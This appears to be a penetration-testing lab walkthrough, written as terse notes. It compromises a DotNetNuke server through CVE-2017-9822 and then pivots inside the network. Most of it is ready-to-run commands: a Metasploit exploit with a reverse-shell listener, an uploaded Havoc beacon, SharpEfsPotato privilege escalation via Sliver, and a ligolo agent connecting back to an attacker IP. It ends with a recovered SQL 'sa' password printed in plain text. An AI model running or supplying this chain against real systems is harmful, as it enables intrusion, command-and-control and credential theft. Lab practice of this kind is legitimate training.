10.10.110.10, 10.9.20.13
The IP is hosting a DotNetNuke (DNN) website.
From the page source it can be seen that the website is from 2017 running 7.0.0 version
A quick google search about DNN leads us to following DNN exploit.
[CVE-2017-9822] DotNetNuke Cookie Deserialization Remote Code Execution (RCE)
Exploit Delivery and Execution
The simple and fast way to get access to this machine is to use the metasploit exploit
[`exploit/windows/http/dnn_cookie_deserialization_rce`](https://www.exploit-db.com/exploits/48336)
sudo msfconsole
use exploit/windows/http/dnn_cookie_deserialization_rce
set RHOSTS 10.10.110.10
set LHOST tun0
set LPORT 80
exploit
sudo msfconsole -q -x "use exploit/windows/http/dnn_cookie_deserialization_rce; set RHOSTS 10.10.110.10; set LHOST tun0; set LPORT 8081; exploit"
Uploading Havoc Beacon
cd All\ Users\\
upload demon_new.exe
The machine name is CYWEBDW$, The OS running is Windows 2019 Server.
Host Recon - Running PrivEsc Checks
dotnet inline-execute /home/jay/prolabs/cybernatics/SharpUp.exe audit
Host Priv Esc
sliver (CASUAL_PLATFORM) > execute-assembly /home/jay/prolabs/cybernatics/SharpEfsPotato.exe -p CASUAL_PLATFORM.exe
Host Recon
The ps commands shows sqlbrowser service running.
https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/?tab=readme-ov-file
Upload all the four files and execute them.
Pivoting: Setting up ligolo proxy
execute agent.exe -connect 10.10.15.207:8443 --ignore-cert
Loot
- flag.txt
Instance LinkedServer Username Password
-------- ------------ -------- --------
SQLEXPRESS m3sqlw.m3c.local sa RDO1uDB05g